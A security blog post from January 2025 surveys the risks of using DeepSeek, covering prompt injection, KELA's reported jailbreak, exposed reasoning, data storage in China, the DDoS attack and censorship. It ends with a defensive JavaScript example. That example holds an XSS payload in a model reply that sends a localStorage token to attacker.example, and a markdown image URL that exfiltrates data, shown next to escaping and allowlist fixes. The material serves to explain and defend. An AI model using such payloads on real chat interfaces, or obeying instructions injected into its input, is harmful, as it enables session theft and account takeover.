Navigating the DeepSeek Dilemma: Security Risks and Key Vulnerabilities

Updated: Jan 29, 2025


Rapid DeepSeek Adoption Has Significant Risks


DeepSeek, a Chinese-developed AI platform, has captured global attention with its innovative technology and cost-effective training methods. Its disruptive presence in the AI market has already moved the share prices of industry giants like Nvidia, underscoring its potential to reshape the AI sector.


Epic Adoption Rates:

  • App Store Dominance: Within seven days of launch, the DeepSeek AI assistant app, built on its R1 model, rose to the top spot in global app stores, surpassing established players like OpenAI's ChatGPT, with roughly 2.6 million downloads reported as of January 27, 2025.

  • Viral Spread:  The platform has garnered substantial attention on social media and in the news, further fueling its popularity. Its competitive performance and cost-effectiveness compared to other AI models have been key drivers of this viral spread.

  • Market Disruption: DeepSeek's emergence has sent shockwaves through the AI market, impacting the share prices of major tech companies like Nvidia. This indicates its potential to disrupt the industry and challenge existing players.

  • User Base: While exact figures are not readily available, the app's top ranking in app stores suggests a considerable user base, likely numbering in the millions, given its global reach.

However, despite its appeal, DeepSeek comes with significant security concerns that both businesses and consumers must address. Given the recent TikTok ban in the US, the same level of scrutiny should be applied here. The list below summarizes the risks known as of today for anyone deploying or using DeepSeek.


Risk Log for DeepSeek Deployment or Utilization:


  • Prompt Injection Attacks: Prompt injection is a serious vulnerability in which attackers manipulate the input given to a language model so that its output does something the application did not intend. In DeepSeek's case, this could allow malicious actors to take over user accounts, potentially accessing sensitive information such as session tokens, past conversations, and even financial data if the platform is used for payments. The attack works because the application trusts what the model produces: content an attacker smuggles into a prompt (for example, hidden in a document the user pastes) is reproduced in the model's reply and then rendered or acted on as if it were legitimate. DeepSeek patched a specific vulnerability of this kind in December 2024, but the potential for similar exploits remains a concern, and this week's DDoS attack shows that the platform is under active attack from more than one direction.

  • Jailbreaking: Jailbreaking refers to bypassing the safety restrictions built into a language model. KELA, a cybersecurity firm, successfully jailbroke DeepSeek, demonstrating its ability to generate harmful outputs like ransomware code, instructions for creating dangerous substances, and fabricated content. This is a significant concern as it allows malicious actors to misuse the AI for illegal activities or to spread harmful information. The fact that DeepSeek could be tricked into providing detailed instructions for malicious activities like stealing credit card data highlights the potential consequences of this vulnerability.

  • Transparency as a Vulnerability: DeepSeek's approach of openly displaying its reasoning process, while intended to enhance transparency, also creates a security risk. By revealing its decision-making paths, DeepSeek gives attackers valuable feedback that they can use to manipulate the model or refine their attacks. This contrasts with models like ChatGPT, which do not expose their full reasoning chain during inference and are therefore harder to probe in this way. The exposed reasoning makes DeepSeek more vulnerable to jailbreaks and to adversarial prompts designed to force specific outputs.

  • Cyber Hacking & Social Engineering: DeepSeek's advanced AI capabilities pose a serious threat in the wrong hands. Its ability to generate human-quality text, translate languages, and write different kinds of creative content can be exploited to create highly convincing phishing emails, spread disinformation, or manipulate individuals. Imagine hyper-realistic phishing messages tailored to individuals based on information gathered from data breaches, or large-scale disinformation campaigns designed to destabilize institutions – these are all potential misuse cases for DeepSeek.

  • Data Privacy Concerns:

    • Data Storage in China:  DeepSeek stores user data on servers located in China. This is a major concern for users in Western countries due to China's data privacy laws, which differ significantly from those in the West, and the potential for government access to this data. This raises questions about the security and confidentiality of sensitive information, particularly in light of China's national intelligence laws that compel organizations to cooperate with state intelligence efforts.

    • Data Collection: DeepSeek collects a wide range of user data, including profile information, user input, technical information, usage information, cookies, and payment information. While some data collection is necessary for personalization and service improvement, the collection of sensitive information like user input and technical details raises concerns about potential privacy violations. This data could be used to build detailed user profiles or even be exploited for malicious purposes.

    • Data Breaches: DeepSeek suffered a "large-scale malicious attack" this week, which disrupted services and forced the company to temporarily limit new user registrations. DeepSeek states that existing users were not affected, and a denial-of-service attack degrades availability rather than exposing data by itself, but the incident shows that the platform is an active target and that a future breach cannot be ruled out. See also the prompt injection item above, which describes a path to user data that has already been demonstrated.

  • Cyberattacks: This cyberattack on DeepSeek, believed to be a distributed denial-of-service (DDoS) attack, highlights the platform's vulnerability. While the company stated that user data was not compromised in this instance, risk remains about the robustness of their security infrastructure and their ability to defend against future attacks.

  • Open-Source Model: DeepSeek's open-source approach, while promoting transparency and community involvement, also presents a security challenge. Making the model's weights and code freely available allows malicious actors to analyze them for weaknesses and develop exploits, including white-box adversarial attacks that are harder to mount against a closed model. The openness cuts the other way too: an organization can run the model on its own infrastructure, which removes the data-residency concern described under Data Privacy Concerns above, but it then owns the model's safety and hardening itself. This trade-off between transparency and security is a key consideration for users of DeepSeek.

  • Lack of Security Certifications: The absence of information about specific security certifications obtained by DeepSeek raises concerns about its commitment to security best practices and compliance with industry standards. This lack of transparency might deter businesses and consumers who prioritize security and compliance when choosing AI platforms.

  • Limited Security Features: While DeepSeek mentions employing technical and organizational security measures, concrete details about these measures are scarce. This lack of transparency makes it difficult to assess the effectiveness of their security posture and raises questions about their ability to adequately protect user data.

  • Unreliable Information: DeepSeek has been found to provide fabricated information, as evidenced by the incident where it generated false details about OpenAI employees. This unreliability raises concerns about the trustworthiness of the information provided by the model and its suitability for critical tasks.

  • Potential for Censorship: As a Chinese company, DeepSeek is subject to state censorship and government influence. This has already been observed in practice: the model restricts or refuses answers on topics such as the Tiananmen Square tragedy.

  • IP Theft:  Given China's history of intellectual property theft, there are concerns that DeepSeek could be used to gather and exploit sensitive information, including trade secrets, proprietary code, or confidential research data. This poses a significant risk for businesses and researchers who utilize the platform.

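The prompt injection item above describes the class of bug behind the December 2024 report: the model's reply is treated as trusted content by the chat front end, so markup or links that an attacker plants in the prompt end up executing or exfiltrating data in the victim's browser. The example below is added here to make that concrete; it is not DeepSeek's code, and the hosts (attacker.example, chat.example), the "userToken" storage key and the image-origin allowlist are all assumptions. It shows a vulnerable renderer next to a hardened one, plus a markdown renderer that blocks the no-script exfiltration path (an image URL carrying data in its query string).

```javascript
// Added example, not DeepSeek's code: why a prompt-injected model reply becomes
// cross-site scripting (XSS) when a chat UI renders model output as HTML, and
// two mitigations: output encoding, and an origin allowlist for markdown images.
// All hosts, the "userToken" storage key and the allowlist are assumptions.

// Constructed model reply: the summary the user asked for, plus a payload the
// attacker smuggled in through the prompt (for example, hidden in a document
// the user pasted). The payload reads a token from localStorage and sends it
// to an attacker-controlled host.
const INJECTED_REPLY =
  'Here is your summary. <img src=x onerror="fetch(\'https://attacker.example/?t=\' ' +
  '+ localStorage.getItem(\'userToken\'))">';

// Vulnerable renderer: interpolates the model's text straight into markup, so
// any tag the model emits is parsed and executed by the browser.
function renderUnsafe(modelText) {
  return `<div class="msg">${modelText}</div>`;
}

// Hardened renderer: encode the HTML metacharacters so the reply is displayed
// as text. The model can still say anything; it can no longer do anything.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderSafe(modelText) {
  return `<div class="msg">${escapeHtml(modelText)}</div>`;
}

// Check used below: does the fragment contain a real tag carrying an inline
// event handler or a javascript: URL? An encoded "&lt;img ..." has no "<", so
// it cannot match; only markup the browser would actually parse does.
const ACTIVE_TAG = /<[a-z][^>]*(\son[a-z]+\s*=|javascript:)/i;
function containsActiveContent(html) {
  return ACTIVE_TAG.test(html);
}

// Most chat UIs render markdown rather than raw HTML. That is not enough: a
// markdown image whose URL carries data in the query string is fetched as soon
// as the <img> is rendered, which exfiltrates the data without any script.
// Render images only from origins the operator controls (assumed allowlist).
const IMAGE_ORIGIN_ALLOWLIST = ['https://chat.example'];

function renderMarkdownSafe(modelText) {
  const escaped = escapeHtml(modelText); // encode first, then add markup back
  return escaped.replace(/!\[([^\]]*)\]\(([^)\s]+)\)/g, (match, alt, url) => {
    let origin;
    try {
      origin = new URL(url).origin; // "null" for javascript: and data: URLs
    } catch (e) {
      return alt; // unparsable or relative URL: show the alt text only
    }
    return IMAGE_ORIGIN_ALLOWLIST.includes(origin)
      ? `<img alt="${alt}" src="${url}">`
      : alt; // off-origin image: drop it, keep the alt text
  });
}

// Stand-alone demonstration.
console.log('unsafe renders active content:',
  containsActiveContent(renderUnsafe(INJECTED_REPLY)));   // true
console.log('safe renders active content:  ',
  containsActiveContent(renderSafe(INJECTED_REPLY)));     // false
console.log(renderMarkdownSafe(
  'Summary done. ![status](https://attacker.example/?t=SECRET)'));
console.log(renderMarkdownSafe('![logo](https://chat.example/logo.png)'));
```

Two further controls belong with this: keep the session token in an HttpOnly cookie rather than localStorage, so even a successful injection cannot read it from script, and ship a Content-Security-Policy that restricts `img-src` and `connect-src` to known origins, which blocks the exfiltration request even if a rendering bug slips through.
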
We will be providing more detail on the actual threat vectors and other risks in future analysis and as further details are available.


Citations:

  • Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI. The Hacker News. December 2024.

  • DeepSeek Blames Disruption on Cyberattack as Vulnerabilities Emerge. SecurityWeek. January 2025.

  • DeepSeek R1 Exposed: Security Flaws in China's AI Model. KELA Cyber Blog. January 2025.

  • DeepSeek AI Might Be the Best ChatGPT Rival—Here's Why You Should Stay Away. BGR Tech. January 2025.

  • Top-Rated Chinese AI App DeepSeek Limits Registrations Amid Cyberattacks. The Hacker News. January 2025.

  • What Does DeepSeek's Cyber Attack Mean for Data Privacy? Cyber Magazine. January 2025.
